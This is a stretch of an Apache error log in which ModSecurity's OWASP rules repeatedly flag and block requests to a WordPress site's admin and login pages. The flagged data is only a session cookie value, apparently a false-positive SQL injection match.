[Mon May 11 18:30:37.722812 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIELQ-Qm4vhlWBPlMjlgwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:37.811252 2026] [authz_core:error] [pid 1424905:tid 1424920] [client 47.128.125.67:43508] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/library/error_log
[Mon May 11 18:30:37.841704 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIELQ-Qm4vhlWBPlMjlhAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:37.841982 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIELQ-Qm4vhlWBPlMjlhAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:38.409408 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIELQ-Qm4vhlWBPlMjlhAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:38.503904 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIELg-Qm4vhlWBPlMjlhQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:38.504204 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIELg-Qm4vhlWBPlMjlhQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:38.898050 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIELg-Qm4vhlWBPlMjlhQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:39.198542 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIELw-Qm4vhlWBPlMjlhwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:39.198819 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIELw-Qm4vhlWBPlMjlhwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:39.806459 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIELw-Qm4vhlWBPlMjlhwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:40.126587 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEMA-Qm4vhlWBPlMjliQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:40.126854 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEMA-Qm4vhlWBPlMjliQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:40.750504 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEMA-Qm4vhlWBPlMjliQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:40.990013 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEMA-Qm4vhlWBPlMjligAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:40.990310 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEMA-Qm4vhlWBPlMjligAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:41.608742 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEMA-Qm4vhlWBPlMjligAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:41.885276 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEMQ-Qm4vhlWBPlMjljAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:41.885566 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEMQ-Qm4vhlWBPlMjljAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:42.454742 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEMQ-Qm4vhlWBPlMjljAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:42.559063 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEMg-Qm4vhlWBPlMjljQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:42.559361 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEMg-Qm4vhlWBPlMjljQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:43.223556 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEMg-Qm4vhlWBPlMjljQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:43.324253 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEMw-Qm4vhlWBPlMjljgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:43.324564 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEMw-Qm4vhlWBPlMjljgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:43.731976 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEMw-Qm4vhlWBPlMjljgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:44.245414 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIENA-Qm4vhlWBPlMjlkAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:44.245847 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIENA-Qm4vhlWBPlMjlkAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:44.864401 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIENA-Qm4vhlWBPlMjlkAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:45.118836 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIENQ-Qm4vhlWBPlMjlkgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:45.119197 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIENQ-Qm4vhlWBPlMjlkgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:45.886133 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIENQ-Qm4vhlWBPlMjlkgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:46.186914 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIENg-Qm4vhlWBPlMjlkwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:46.187221 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIENg-Qm4vhlWBPlMjlkwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:46.961853 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIENg-Qm4vhlWBPlMjlkwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:47.267507 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIENw-Qm4vhlWBPlMjllQAAAAM"], referer: https://rentparadise.fr/wp-login.php
